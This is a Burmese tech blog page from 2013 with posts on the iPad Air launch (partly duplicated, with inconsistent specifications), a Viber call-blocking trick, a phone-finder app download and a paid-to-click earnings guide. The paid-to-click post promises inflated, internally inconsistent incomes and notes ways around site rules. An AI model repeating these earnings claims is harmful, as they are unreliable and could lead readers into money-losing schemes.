Blogger Widgets

Wednesday, October 23, 2013

လူႀကဳိက္မ်ား ေရပန္းစားဦးမယ့္ iPad Air

လူႀကဳိက္မ်ား ေရပန္းစားဦးမယ့္ iPad Air

=======================
ခြန္ေန(AMMG)

Apple's Event ပြဲကေတာ့ မေန႔က အေမရိကန္  San Francisco မွာရွိတဲ့ Yerba Buena Center မွာေအာင္ျမင္စြာက်င္းပ ၿပီးစီးခဲ့ပါၿပီ။ က်င္းပသြားတဲ့
ပြဲမွာေတာ့ အားလုံးသိၿပီးေလာက္ၿပီျဖစ္တဲ့ Apple ရဲ ႔

1. OS X 10.9
2. New Macbook 13 & 15
3. Mac Pro
4. iLife
5. iWork
6. iPad Air
7. iPad Mini with Retina Display ေတြ ကို ထုတ္ေဖာ္ျပသ သြားပါတယ္။

အဲဒီထုတ္ကုန္ေတြထဲမွာ iPad ရဲ ႔မ်ဳိးဆက္သစ္ iPad Air ကေတာ့ ကမာၻတစ္
ဝွမ္းမွာရွိတဲ့ Apple ပုရိတ္သတ္ေတြ စိတ္ဝင္စားမႈအမ်ားဆုံးနဲ႔ လူႀကဳိက္
အမ်ားဆုံး ထုတ္ကုန္တစ္ခုျဖစ္လာႏုိင္ပါတယ္။

အေၾကာင္းကေတာ့ အသြင္ျပင္ေကာ၊ဒီဇုိင္းမွာပါ ထြက္ေပၚၿပီးသမွ် အရာေတြ
ထက္ စြမ္းေဆာင္ရည္မွာေကာ၊အရည္ေသြးပုိင္းမွာပါ အကုန္လုံးကုိ ေနာက္
ေကာက္ခ်သြားႏုိင္လုိ႔ပါပဲ။

iPad ရဲ ႔မ်ဳိးဆက္သစ္ iPad Air မွာ ယခင္ကခန္႔မွန္းထားသလုိပဲ iPhone 5S
မွာပါဝင္လာတဲ့ A7 Chip,64bit architecture ထည့္သြင္းပါဝင္လာတဲ့ အတြက္ စြမ္းေဆာင္ရည္ပုိင္းမွာ ကမာ႔ၻအေကာင္းဆုံး အျမန္ဆုံးဆုိတဲ့ ဂုဏ္ပုဒ္ကုိ ရရွိထားလုိ႔ပါပဲ။
။

အသြင္းအျပင္ ဒီဇုိင္းမွာလည္း အေပါ့ဆုံး၊အပါးဆုံးဆုိတဲ့ ဂုဏ္ပုဒ္နဲ႔အညီ
အေလးခ်ိန္ ၁ ေပါင္တိတိသာ ေလးပါတယ္။ ၿပီးေတာ့ အသုံးျပဳသူေတြ
အတြက္ေက်နပ္ေစေလာက္တဲ့ က်ယ္ျပန္တဲ့မ်က္ႏွာျပင္ ၉.၄ လက္မ၊ အထူ
၀.၂၉ လက္မ(၇.၅ မီလီမီတာ) ရွိပါတယ္။

9.7-inch Retina display + iOS 7

မ်က္ႏွာျပင္အက်ယ္ ၉.၇ လက္မွာ Retina မ်က္ႏွာျပင္အသုံးျပဳေပးထားတဲ့
ဒီ iPad Air ဟာ pixels 1.3 million အထိၾကည္လင္ျပတ္သားေစမွာ ျဖစ္တဲ့
အတြက္ HDTV လုိရုပ္ထြက္ေကာင္းတဲ့ မ်က္ႏွာျပင္ထက္ အဆသန္းေပါင္း 
မ်ားစြာ ၾကည္လင္သာလြန္ေစပါတယ္။ 

Ultrafast wireless

အခုထြက္ရွိလာတဲ့ iPad Air မွာေမာ္ဒယ္လ္ႏွစ္မ်ဳိးျဖစ္တဲ့ iPad Air Wifi နဲ႔
iPad Air Wifi+Cellular ဆုိၿပီးထုတ္လပ္ထားတာပါ။ Wifi စြမ္းေဆာင္မႈ
အပုိင္းမွာ သာမန္ထက္ ႏွစ္ဆျမန္ဆန္ေစတဲ့ စြမ္းေဆာင္ရည္ပုိင္းကုိရရွိေစမွာ
ပါ။ Wifi+Cellular အမ်ဳိးအစားမွာေတာ့ Wifi စနစ္တင္မက Sim-Card အသုံးျပဳကာ မုိဘုိင္းလ္ ဆက္သြယ္ေရးစနစ္ျဖစ္တဲ့ အျမန္ဆုံးအင္တာနက္
ဝန္ေဆာင္မႈျဖစ္တဲ့ LTE network စနစ္ကုိပါ အသုံးျပဳႏုိင္မွာပါ။

Powerful apps included

ဒါကေတာ့ Apple ေတြမွာသာသီးသန္႔ရွိတဲ့ မႈပုိင္ Applications ပါ။ အဆုိပါ
Apps ဟာ အီးေမလ္ေတြအလြယ္တကူပုိ႔လုိ႔အဆင္ေျပေစမယ့္အျပင္၊ သီခ်င္း
ေတြကုိနားဆင္အသုံးျပဳႏုိင္တယ္၊ မိမိဖန္တီးထားတဲ့ သီခ်င္းေတြ၊ Web ေတြ
ရုပ္သံဖုိင္ေတြကုိ အင္တာနက္ေပၚမွာ အလြယ္တကူ တင္လုိ႔ရတယ္။ အဲဒီ
ထဲမွာ Musics ပုိင္းေတြျဖစ္တဲ့ ဂီတာတီးတာေတြ၊ Keynote ေတြကုိမိမိကုိယ္
တုိင္စိတ္ႀကဳိက္ေရးဆြဲ ဖန္တီးလုိ႔ရတယ္။

Over 475,000 apps on the App Store

iPad Air ကေန Apple Store က Apps ေပါင္း ၄၇၅၀၀၀ ကုိအလြယ္တကူ
ရယူႏုိင္တယ္။

ထြက္ရွိလာမယ့္ ေမာ္ဒယ္လ္နဲ႔ ေစ်းႏႈန္းေတြကေတာ့

Wi‑Fi Version အတြက္

16GB   -  $499
32GB   -  $599
64GB   -  $699
128GB  -  $799

Wi‑Fi + Cellular Version အတြက္

16GB   -   $629
32GB   -  $729
64GB   -  $829
128GB -  $929 

အမည္းေရာင္ နဲ႔ ေငြေရာင္ဆုိၿပီး ထုတ္လုပ္ထားတယ္။ ႏုိင္ဝင္ဘာ-၁ ရက္ေန႔မွာျဖန္႔ခ်ိေရာင္းခ်ေပးပါလိမ့္မယ္။

Ref:Apple
 iPad ရဲ ႔မ်ဳိးဆက္သစ္ iPad Air မွာ ယခင္ကခန္႔မွန္းထားသလုိပဲ iPhone 5S မွာပါဝင္လာတဲ့ A7 Chip,64bit architecture ထည့္သြင္းပါဝင္လာတဲ့ အတြက္ စြမ္းေဆာင္ရည္ပုိင္းမွာ ကမာ႔ၻအေကာင္းဆုံး အျမန္ဆုံးဆုိတဲ့ ဂုဏ္ပုဒ္ကုိ ရရွိထားလုိ႔ပါပဲ။ ။ အသြင္းအျပင္ ဒီဇုိင္းမွာလည္း အေပါ့ဆုံး၊အပါးဆုံးဆုိတဲ့ ဂုဏ္ပုဒ္နဲ႔အညီ အေလးခ်ိန္ ၁ ေပါင္တိတိသာ ေလးပါတယ္။ ၿပီးေတာ့ အသုံးျပဳသူေတြ အတြက္ေက်နပ္ေစေလာက္တဲ့ က်ယ္ျပန္တဲ့မ်က္ႏွာျပင္ ၉.၄ လက္မ၊ အထူ ၀.၂၉ လက္မ(၇.၅ မီလီမီတာ) ရွိပါတယ္။
 9.7-inch Retina display + iOS 7 မ်က္ႏွာျပင္အက်ယ္ ၉.၇ လက္မွာ Retina မ်က္ႏွာျပင္အသုံးျပဳေပးထားတဲ့ ဒီ iPad Air ဟာ pixels 1.3 million အထိၾကည္လင္ျပတ္သားေစမွာ ျဖစ္တဲ့ အတြက္ HDTV လုိရုပ္ထြက္ေကာင္းတဲ့ မ်က္ႏွာျပင္ထက္ အဆသန္းေပါင္း မ်ားစြာ ၾကည္လင္သာလြန္ေစပါတယ္။ Ultrafast wireless အခုထြက္ရွိလာတဲ့ iPad Air မွာေမာ္ဒယ္လ္ႏွစ္မ်ဳိးျဖစ္တဲ့ iPad Air Wifi နဲ႔ iPad Air Wifi+Cellular ဆုိၿပီးထုတ္လပ္ထားတာပါ။ 
Wifi စြမ္းေဆာင္မႈ အပုိင္းမွာ သာမန္ထက္ ႏွစ္ဆျမန္ဆန္ေစတဲ့ စြမ္းေဆာင္ရည္ပုိင္းကုိရရွိေစမွာ ပါ။ Wifi+Cellular အမ်ဳိးအစားမွာေတာ့ Wifi စနစ္တင္မက Sim-Card အသုံးျပဳကာ မုိဘုိင္းလ္ ဆက္သြယ္ေရးစနစ္ျဖစ္တဲ့ အျမန္ဆုံးအင္တာနက္ ဝန္ေဆာင္မႈျဖစ္တဲ့ LTE network စနစ္ကုိပါ အသုံးျပဳႏုိင္မွာပါ။ Powerful apps included ဒါကေတာ့ Apple ေတြမွာသာသီးသန္႔ရွိတဲ့ မႈပုိင္ Applications ပါ။ 
အဆုိပါ Apps ဟာ အီးေမလ္ေတြအလြယ္တကူပုိ႔လုိ႔အဆင္ေျပေစမယ့္အျပင္၊ သီခ်င္း ေတြကုိနားဆင္အသုံးျပဳႏုိင္တယ္၊ မိမိဖန္တီးထားတဲ့ သီခ်င္းေတြ၊ Web ေတြ ရုပ္သံဖုိင္ေတြကုိ အင္တာနက္ေပၚမွာ အလြယ္တကူ တင္လုိ႔ရတယ္။ အဲဒီ ထဲမွာ Musics ပုိင္းေတြျဖစ္တဲ့ ဂီတာတီးတာေတြ၊ Keynote ေတြကုိမိမိကုိယ္ တုိင္စိတ္ႀကဳိက္ေရးဆြဲ ဖန္တီးလုိ႔ရတယ္။ Over 475,000 apps on the App Store iPad Air ကေန Apple Store က Apps ေပါင္း ၄၇၅၀၀၀ ကုိအလြယ္တကူ ရယူႏုိင္တယ္။
 ထြက္ရွိလာမယ့္ ေမာ္ဒယ္လ္နဲ႔ ေစ်းႏႈန္းေတြကေတာ့ Wi‑Fi Version အတြက္ 16GB - $499 32GB - $599 64GB - $699 128GB - $799 Wi‑Fi + Cellular Version အတြက္ 16GB - $629 32GB - $729 64GB - $829 128GB - $929 အမည္းေရာင္ နဲ႔ ေငြေရာင္ဆုိၿပီး ထုတ္လုပ္ထားတယ္။ ႏုိင္ဝင္ဘာ-၁ ရက္ေန႔မွာျဖန္႔ခ်ိေရာင္းခ်ေပးပါလိမ့္မယ္။

Credit To : TechSpace Journal

Viber ကေန ကိုယ္မေခၚေစခ်င္တဲ့ Viber Call ႏွင့္ Message မ်ားကို Block နည္း

အခု က်ေနာ္ ေျပာမွာကေတာာ့ Viber မွာ ကိုယ္မလိုခ်င္တဲ့ Viber call ေတြ Message ေတြကို မ၀င္ေအာင္လုပ္နည္းေလးပါ...။ ေတာ္ေတာ္မ်ားမ်ားလည္း သိျပီးသားျဖစ္မွာပါ..။ မသိေသးတဲ့လူေတြ အတြက္ေပါ့ဗ်ာ... အရင္ဆံုး ရွိျပီးသား viber ထဲကေန Deactive ျပန္လုပ္လိုက္ပါ...(Setting ထဲကေန ၀င္လုပ္လို ့ရပါတယ္) ျပီးရင္ viber ကို အစကေန setup ျပန္လုပ္ရပါမယ္...။ အဲ့မွာ မိမိဖုန္းနံပါတ္ ရိုက္ထည့္ရမယ့္ ေနရာ ေရာက္ရင္ မိမိဖုန္းနံပါတ္ရဲ ့ေနာက္ဆံုး ဂဏန္း တစ္လံုး အပိုရိုက္ထည့္လိုက္ပါ..။ eg.09430000011 (ေနာက္ဆံုး 1 ကအပို တစ္လံုးပါ) Viber ကေန code အတြက္ ဖုန္းေခၚတဲ့ အခါ မိမိဖုန္းထဲကိုပဲ ၀င္ပါတယ္.။ ေနာက္ဆံုး တိုးထားတဲ့ 1 ဂဏန္း က အက်ံဳးမ၀င္ပါဘူး..။ Viber code ရျပီဆိုရင္ေတာ့ မိမိဆီကို messages တို ့viber ph call တို ့ေခၚေစခ်င္တဲ့လူေတြကို မိမိ ဘက္ကေနအရင္ဆံုး message ပို ့ထားလိုက္ပါ.။ အဲ့ဒါမွ မိမိ ဘက္က စပို ့ထားတဲ့လူေတြသာလွ်င္ မိမိဆီကို ျပန္ျပီး message တို ့ph call တို ့ေခၚလို ့ရမွာျဖစ္ပါတယ္..။ ကဲ ... ဒီေလာက္ဆိုရင္ ကိုယ္ ဆီကို မလိုခ်င္တဲ့ message ေတြ ဖုန္း call ေတြ ကို viber ကေန ကာကြယ္ႏိုင္မယ္လို ့ထင္ပါတယ္..။ အားလံုးပဲ စိတ္အေႏွာက္အယွက္ျဖစ္ျခင္းကေန ကင္းေ၀းၾကပါေစခင္ဗ်ာ...။

Friday, October 11, 2013

လက္ခုပ္တီးၿပီး ဖုန္းရွာမယ္

 



မိမိဖုန္းအထားမွား ရင္ေသာ္လည္းေကာင္း၊ အနီးအနားမွာရွာမေတြ႕ရင္ေသာ္လည္းေကာင္း လက္ခုပ္တီးၿပီး
ဖုန္းရွာလို႕ရမယ့္ clap to find apk ေလးျဖစ္ပါတယ္။ လက္ခုပ္တီးလိုက္တာနဲ႕ ဖုန္းက မိမိေပးထားတဲ့ အသံေလး ထျမည္မွာျဖစ္ပါတယ္။ ကၽြန္ေတာ္စမ္းသပ္ ထားၿပီးသား ပါခင္ဗ်ာ။ အရမ္းအဆင္ေျပတဲ့ ေဆာ့၀ဲလ္ေလးျဖစ္ ပါတယ္။ ေဆာ့၀ဲလ္ကိုဖြင့္ၿပီး လုပ္ရမဲ့အဆင့္ေလးေတြကို ကၽြန္ေတာ္
Screenshot ရိုက္ၿပီး ပံုေလးေတြနဲ႕ျပထားပါတယ္ခင္ဗ်ာ။ မိမိႏွစ္သက္ရာသီးခ်င္းေလးေတြကို ringtone အျဖစ္ေပးလုိ႕ရပါတယ္ခင္ဗ်ာ။ ေဆာ့၀ဲလ္ကိုဖြင့္ၿပီး အသံုးျပဳမယ္ဆိုရင္ ျပန္ထြက္တဲ့အခါ Close မလုပ္ပဲနဲ႕ Minimize လုပ္ေပးပါ။ ဒါမွ အသံုးျပဳလို႕ရမွာပါခင္ဗ်ာ။

Download=>> Link 1, Link 2

ေဒါင္းလုပ္ လုပ္နည္းမ်ား (မျဖစ္မေနဖတ္ေပးပါ)

ကၽြန္ေတာ့္ဆိုဒ္ေလးမွာ Download လုပ္ျခင္းနဲ႔ ပက္သတ္လို႕ အခတ္အခဲေလးေတြ
ျဖစ္မွာစိုးလို႕ Download လုပ္နည္းေလးေတြ ေျပာျပလိုက္ပါတယ္။ သိၿပီးသားသူမ်ားကေတာ့ ေက်ာ္ဖတ္သြားေပးပါခင္ဗ်ာ။
အခုေဖာ္ျပထားတဲ႔ Download လုပ္ရမယ့္ဆိုဒ္ေတြက ကၽြန္ေတာ့္ဆိုဒ္မွာ
အသံုးမ်ားတဲ႔ဆိုဒ္ေတြျဖစ္လို႕ ပံုႏွင့္တကြ ေသခ်ာေလးရွင္းျပထားပါတယ္။
အျခားေသာ Website မ်ားတြင္ တင္ထားေသာ ေဆာ့၀ဲမ်ားကိုလည္း
ေဒါင္းႏိုင္ရန္အတြက္ ရည္ရြယ္ပါသည္။
~~~~~~~~~~~~~~~~
Adf.ly
 Download လင့္ေတြကို Adf.ly ေလးနဲ႕ခံထားတာကို
ေတာ့အေတာ္မ်ားမ်ားသိပါတယ္ SKIP ႏွိပ္ရတာေလးပါ
ဥပမာ http://adf.ly/XLhXZ လင့္မ်ိဳးေပါ့
အဲဒါဆိုရင္ adf.ly ဆိုဒ္ေလးေပၚလာပါမယ္ အဲဒီမွာ 
5 second ေလာက္ေစာင့္ေပးရမယ္
 
ၿပီးမွ ညာဘက္အေပၚဆံုးေထာင့္နားက SKIP  AD  ဆိုတာေလး ေပၚလာရင္ႏွိပ္ေပးရံုပါပဲ
ေဒါင္းလုပ္ လင့္ေနရာကို ေရာက္ပါမည္။
 
ဒါက ADF.LY ေက်ာ္နည္းေလးပါ
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
D-h.st မွေဒါင္းနည္း
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
TusFile မွေဒါင္းနည္း

၁. အမွန္ျခစ္ျဖဳတ္ပါ...
၂. Download File ဆိုတာကိုႏွိပ္ျပီးေဒါင္းပါ.။


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 
Share Beast မွ ေဒါင္းနည္း
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Zippyshare မွ ေဒါင္းနည္း
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wednesday, October 9, 2013

အခုေျပာမွာကေတာ့ (PTC) အေၾကာင္း ပါ



PTC ဆိုက္ဆိုတာ ဘာ လဲဆိုတာကို သိေအာင္ ဒီမွာ ရွင္းျပမယ္၊ (PTC = Paid To Click)  ျမန္မာလိုဘာ သာ ျပန္ရင္ ကလစ္ႏွိပ္ရင္ ပိုက္ဆံေပးတယ္ဆိုတဲ့ သေဘာပါ။ PTC Website ေတြ စတင္ေပၚေပါက္ လာတာကေတာ့ 2007-2008 ကတည္းကပါ။ အြန္လိုင္း ေပၚမွာ Website ေတြအမ်ား ႀကီးရွိပါတယ္၊ အဲဒိ Website ကုမၼဏီေတြ က သူ တုိ႔ရဲ့ ထုတ္ကုန္ကို ကမၻာ တစ္၀ွမ္းမွာ ရွိတဲ့ လူေတြကို ေၾကာ္ျငာ ခ်င္ၾကပါတယ္၊ အလြယ္ကူဆံုးနဲ႔ အထိေရာက္ဆံုး  နည္းကေတာ့ ေန႔စဥ္ လူကုေ႗ ေပါင္းမ်ားစြာ က်င္လည္က်က္စားေနတဲ့ Online ေစ်း ကြက္မွာ ေၾကာ္ျငာ ျခင္းပါပဲ။ ဒါေပမဲ့ အြန္လိုင္းမွာလဲ သူတုိ႔အေနနဲ႔ သူတို႔ရဲ႕Product ကို သူတို႔ ကိုပိုင္ Website မွာ တင္ေရာင္းရံု ေၾကာ္ၿငာတင္ ရံုနဲ႔တင္ အဆင္မေျပၾကျပန္ဘူး။ျပသာနာက ဘယ္သူကသူတို႔ Website ကို ၀င္ၾကည့္မွာလဲ၊ Website  တင္တိုင္းလဲ လူ၀င္ၾကည့္တာမွမဟုတ္တာ၊ အဲ့ဒိေတာ့ ေၾကာ္ျငာ
နဲ႔ပက္သက္လို႔ ေျဖရွင္းခ်က္ေတြကိုရွာ ေတာ့   ေန႔စဥ္အြန္လိုင္းေပၚမွာ လူအသံုး အမ်ားဆံုး ျဖစ္တဲ့ Google, Yahoo, Bing, Facebook,  အျခားဆိုရွယ္ ဆိုက္တစ္ခ်ိဳ႕ ကို ေတြ႔သြားပါတယ္၊ အဲ႔ဒိ Social ဆိုက္တခ်ိဳ႕ရဲ့ Home Page မွာ သူတို႔ရဲ့ ေၾကာ္ျငာကို တင္ထားလိုက္ ရင္ သူတို႔ ရဲ့ ေၾကာ္ျငာ ကိုေန႔စဥ္ လူေပါင္း ကုေ႗နဲ႔ခ်ီျပီး ေတြ႕ေတာ့ မယ္ဆိုတဲ႔အၾကံနဲ႔  အဲ႔ဒိ  Social  ဆိုက္ေတြနဲ႕ စာခ်ဳပ္ေတြခ်ဳပ္ ေငြေတြ ေဒၚလာသန္းေပါင္းမ်ားစြာ ေပးျပီးသူတို႔ ရဲ့ေၾကာ္ျငာေတြကို စတင္ခဲ့ပါတယ္၊
ဒိလိုနဲ႔ပဲ နာမည္ႀကီးတဲ႔ Social ဆိုက္ေတြမွာ  ေၾကာ္ျငာေတြကို ပံုနဲ႔ တစ္မ်ိဳး စာနဲ႔တစ္မ်ိဳး ၀င္ေရာက္ေၾကာ္ျငာလာၾက ေတာ့ပါတယ္။ ဒါေပမဲ႔ ေၾကာ္ျငာတဲ့ ကုမၼဏီ  ေတြထဲက တစ္ခ်ိဳ႕ ကထင္သလာက္ခရီးမေပါက္ၾကပါဘူး၊ အဲ့ဒိလိုအပ္ခ်က္ကို ျဖည့္ဖို႔ အတြက္ PTC Website တစ္ခ်ိဳ႕ ေပၚထြက္လာပါတယ္၊ PTC ဆိုက္ေတြက ကုမၼဏီေတြကေန သင့္သင့္တဲ့ေငြပမာဏ နဲ႔ ေၾကာ္ျငာေတြကို လက္ခံပါတယ္၊  အဲ့ဒိ ကုမၼဏီကေၾကာ္ျငာေတြကို လူတစ္ေထာင္ၾကည့္ ရင္ $5 မွ $10 အထိ အခေက်းေငြယူျပီး သူတို႔ ၀က္ဆိုက္ေတြမွာ ေၾကာ္ျငာတင္ေပးၾကပါတယ္၊ ျပီးေတာ့သူတုိ႔က ေၾကာ္ျငာ ၾကည္႔မယ့္လူ (Member) ရွာပါတယ္၊ အဲ့ဒီ႔ ေေၾကာ္ျငာ ၾကည္႔မယ့္လူေတြကို အေယာက္ တစ္ေထာင္ကို $2 မွ $5 အထိေပးျပီး၀င္ၾကည့္ခိုင္းပါတယ္ ဒါေပမဲ့ ေၾကာ္ျငာ ၾကည့္တဲ့လူ (Member) ေတြက 5 စကၠန္႔မွ 10 စကၠန္႔ အထိအတိအက် ၾကည္႔ေပးရပါ တယ္ ၊  ဒီလိုနည္းနဲ႔ PTC ဆိုက္ေတြက အြန္လိုင္းေပၚမွာ ေနရာရလာၾကပါတယ္၊ ေၾကာ္ျငာ တဲ့သူကလည္း သူ႔ေၾကာ္ျငာကို  လူေတြေသခ်ာၾကည့္တဲ့အတြက္ ေက်နပ္သလို၊ ေၾကာ္ျငာ လက္ခံတဲ့ Website ကလည္း အျမတ္ရေတာ့ ေက်နပ္ၾကပါတယ္၊ အဲ ေၾကာ္ျငာ ၾကည့္ျပီး ပိုက္ဆံရွာတဲ့ ကၽြန္ေတာ္တို႔ (Member) အေနနဲ႔ ကလည္း ေက်နပ္မူရွိပါတယ္၊ ဒါက PTC Website ေတြရဲ့ ျဖစ္တည္မူပါပဲ။

သတိျပဳစရာ အခ်က္မ်ား

ကၽြန္ေတာ္ အထူးသတိေပးခ်င္ တာက အြန္လိုင္းေပၚမွာ PTC Website၁၅၀.၀၀၀  ေက်ာ္ေက်ာ္ ရွိပါတယ္ ။ ဒါေပမဲ့ တကယ္ပိုက္ဆံ ေပးတဲ့ဆိုက္က အေတာ့ကို နည္းပါတယ္။ ေနာက္ျပီး Internet ဆိုတာ  ယံုၾကည္စိတ္ခ်ရတ့ဲဆိုဒ္ အမွန္တကယ္ရိုးသားျပီး  ေျပာရင္ ေျပာတဲ့ အတိုင္းလုပ္ တဲ့ဆိုဒ္မ်ားအေတာ္ကိုရွားပါတယ္။  (Internet Is Full of Scam) ကၽြန္ေတာ္ ေျပာတာ ကို မယံုရင္လဲ ကို႔ဟာကို ေလ့လာၾကည့္ႏိုင္ပါတယ္။  တစ္ခ်ိဳ႕ အခြင္႔အေရး ရွာေနတဲ့သူေတြက PTC Website အတုေတြ ဖြင့္ တယ္။ ခင္ဗ်ား တုိ႔ဆီက ၀င္ေၾကး ေတာင္းလိမ့္မယ္ ျပီးရင္ ေျပာက္သြားေရာ၊ တစ္ခ်ိဳ႕ ပိုလို႔ေတာင္ဆိုးေသးတယ္၊ ခင္ဗ်ား ကို သံုး လေလာက္အလုပ္ခိုင္းျပီး ျပီးရင္ ခင္ဗ်ား ေငြလဲထုတ္ေရာ ခင္ဗ်ားကို ဘာ မွ အေၾကာင္း မျပန္ေတာ့ဘူး၊ အဲ့ဒီ့ေတာ့ ကၽြန္ေတာ္ အ ၾကံျပဳခ်င္တာက ကၽြန္ေတာ္ ေျပာ တဲ့ဆိုက္ေတြကို အရင္လုပ္ပါ။ အတိအက်ေလ့လာ ျပီး ႏွစ္အေတာ္ ၾကာျပသာနာ မရွိတဲ့ဆိုက္ေတြကို ကၽြန္ေတာ္ တင္ျပထား တာပါ၊ ဒါေပမဲ့ ကို႔ပါကို ေလ့လာခ်င္ရင္ လဲ သေဘာ ပါ သတိထား ပါလို႔ပဲ ေျပာ ပါရေစ။
ဒီမွာ ေနာက္ဆံုး အေနနဲ႔ ေျပာ ခ်င္တာက ေတာ့၊ PTC Website ေတြဟာ အစမွာ ေငြနည္းနည္း ပဲ၀င္ပါတယ္၊ Site တစ္ခု ကို တစ္လ $1.5 ေန $2 အထိပဲ ၀င္ပါတယ္၊ ဒါေပမဲ့  Site 5ခု မွ 10ခု  ေလာက္ ခ်ိတ္ထားႏိုင္ရင္ ေတာ့ တစ္လ $15 - $20 ၀န္းက်င္ရပါလိမ့္မယ္၊ ဒါေပမဲ့ တစ္ေန႔ကို မိနစ္ 20 ထက္ပိုျပီး အလုပ္လုပ္စရာ မလိုပါဘူး၊  PTC ဆိုက္ရဲ့ သေဘာက လြယ္ တယ္၊ လက္ေခ်ာင္းတစ္ေခ်ာင္း ရွိရင္ အလုပ္လုပ္လို႔ရ တယ္ ဒါေပမဲ့ ေငြျဖည္းျဖည္း ခ်င္းပဲရွာ လို႔႔ရမယ္။ တစ္လမွ $20 ထဲဆိုလို႔ စိတ္မညစ္သြားပါနဲ႔ ၊ ကၽြန္ေတာ္ တုိ႔ ဆိုက္ရဲ့ေငြရွာ ေဖြေရး အစီအစဥ္ ေတြရဲ့ ပထမအဆင့္ပဲရွိပါေသးတယ္၊ ၀င္ေငြ တိုးေအာင္ လုပ္တဲ့ နည္းေတြ အမ်ားၾကီးရွိပါတယ္။

မွတ္ခ်က္။    ။ ကၽြန္ေတာ္ PTC Website ေတြ နဲ႔ ပိုက္ဆံ ရွာေနတာ (၄) ႏွစ္ေက်ာ္ ေနပါၿပီ။

အခု ကၽြန္ေတာ့ PTC Website ေတြ ရဲ႕ ၀င္ေငြဟာ တစ္ရက္  $200 ($200/Day) ၀န္းက်င္ရွိပါတယ္။ တစ္ႏွစ္ ဆိုရင္ $80,000 ($80,000/year) ရွိပါတယ္။ အျမတ္ သီးသန္႔တြက္မည္ ဆိုပါက တစ္ႏွစ္ $60,000 ေက်ာ္ေက်ာ္ ရွိပါတယ္။ သည္အေျခအေန ေရာက္ဖို႔ ကၽြန္ေတာ့ အိပ္ကပ္ထဲက ပိုက္ဆံ တစ္ျပားမွ မဆိုက္ခဲ့ ပါဘူး။ ဆိုက္ခ်င္လဲ ဆိုက္လို႔မရခဲ့ဘူးေလ။ အဒီတုန္းက Paypal Account လဲ မဖြင့္တတ္ခဲ့ဘူးေလ။ ရွင္းရွင္း ေျပာရရင္ PTC Account ထဲမွာ ရွိတဲ့ ပိုက္ဆံ ေတာင္ ဘယ္လိုထုတ္ ရမယ္မွန္း သိခဲ့တာမဟုတ္ဘူး။ အခုျပန္ေတြးၾကည့္ရင္ေကာင္းတယ္လို႔ေတာင္ထင္ပါတယ္ ဘာေၾကာင့္လဲ ဆိုေတာ့ ပိုက္ဆံ ထုတ္မရေတာ့ ရတဲ့ ပိုက္ဆံကို PTC Site ေတြမွာ Referral (PTC ရဲ႕အသက္ ဟာ Referral လို႔ပဲ မွတ္ထာေပးပါ၊ Referral အေၾကာင္းကို ေအာက္မွာ ရွင္းျပပါမယ္)  ေတြ ၀ယ္ၿပီးရင္း၀ယ္ရင္းနဲ႔ပဲ အခု သည္ေလာက္ ၀င္ေငြ ရလာတာပါ။ ခင္ဗ်ား တို႔လည္း စအလုပ္လုပ္ျပီး တစ္ႏွစ္ေလာက္ ၾကာရင္ တစ္ႏွစ္ကို $8,000 ၀န္းက်င္ေလာက္ ရေနပါျပီ။ ပိုက္ဆံကို မထုတ္ ပဲ ႏွင့္ ဆက္ရင္းသြားရင္ေတာ့ ၃ ႏွစ္ေလာက္ေနရင္ အနည္းဆံုး တစ္ႏွစ္ $60,000 ေလာက္ ရမွာပါ။ အဲဒိ အခ်ိန္ေရာက္ လွ်င္ေတာ့ ထုတ္ျပီးရင္း ထုတ္ေပါ့ ။ ကၽြန္ေတာ့လည္း မေမ့ နဲ႔ေပါ့။
PTC Website ေတာ္ေတာ္ မ်ားမ်ား ကေတာ့ တစ္ပါတ္ တစ္ႀကီမ္ Cashout/Withdraw လုပ္လို႔ရပါ တယ္။
Minimum Cashout/Withdraw = $2
Maximum Cashout/Withdeaw = No
Cashout/Withdraw Period = one time/ week
Cashout/Withdraw Fees = 3% to 5%

PTC စည္းကမ္းခ်က္မ်ား

PTC Website တိုင္းမွာ သူ႔စည္းကမ္းနဲ႔သူရွိပါတယ္။၄င္းစည္းကမ္းမ်ားကိုမလိုက္နာရင္ေတာ့  ကိုယ့္အေကာင့္ကိုယာယီထိန္းသိမ္းျခင္းေသာ္လည္းေကာင္း၊အျမဲတမ္းထိန္းသိမ္းျခင္း ေသာ္လည္းေကာင္း  အေရးယူခံရႏိုင္ပါတယ္။ ဒီလိုမျဖစ္ရေအာင္ဒီလိုမျဖစ္ရေအာင္
စည္ကမ္းခ်က္မ်ားကို ေဖာ္ျပေပးသြားမယ္။

ကြန္ပ်ဴတာ တစ္လံုးအေကာင့္တစ္ခုႏႈန္း

PTCWebsite
 ေတြဟာအိမ္ကေနပိုက္ဆံရွာဖို႔လုပ္ေပးထားတဲ့အတြက္ကြန္ပ်ဴတာတစ္လံုးကို အေကာင့္တစ္ခုပဲလုပ္ခြင့္ေပးပါတယ္။ တစ္ခုထက္ပိုေသာ အေကာင့္မ်ားကို ယာယီပိတ္ပစ္ျခင္းေသာ္လည္းေကာင္း၊ အျမဲတမ္းပိတ္ပစ္ျခင္းေသာ္လည္းေကာင္း   လုပ္ခံရႏိုင္ပါတယ္။

အင္တာနက္ဆိုင္မ်ားမွ အသံုးျပဳျခင္း

စည္းကမ္းခ်က္မ်ားထဲမွာ အင္တာနက္ကေဖးဆိုင္မ်ားမွ အသံုးျပဳျခင္းကိုလက္မခံ ေသာ္လည္း တကယ္တမ္း သံုးလို႔ရပါတယ္။ အဒိ Computer ေတြမွာ Account မဖြင့္ထားဘူး ဆိုရင္ ရပါတယ္။

Proxy အသံုးျပဳျခင္း

login ဝင္ဖို႔ proxy သံုးႏိုင္ေသာ္လည္း ေၾကာ္ျငာၾကည္႔ဖို႔ အသံုးျပဳျခင္းလက္မခံပါ။
